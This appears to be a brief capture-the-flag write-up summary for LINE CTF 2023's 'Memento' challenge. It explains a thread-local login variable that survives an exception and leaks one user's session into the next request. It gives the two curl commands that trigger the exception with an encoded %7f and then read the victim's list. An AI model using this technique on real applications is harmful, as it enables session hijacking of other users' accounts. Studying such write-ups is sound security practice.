[https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-
linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-
linectf-2023.html)

Tl;dr: Application stores current logged in user in a (thread local) variable
whose life time persists beyond the http request. Normally it is cleared at
the end of each request but if you trigger an exception it is not and you will
continue to be logged in as that user in the next request even without their
cookie. You can trigger an exception by reporting a url with %7f in it.

The solution looks like:

`curl
'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'`

followed by

`curl 'http://34.84.65.148:31337/bin/list'`

Repeat steps multiple times as the server has multiple threads.

Please see [https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-
linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-
linectf-2023.html) for full details.

Original writeup (https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-
linectf-2023.html).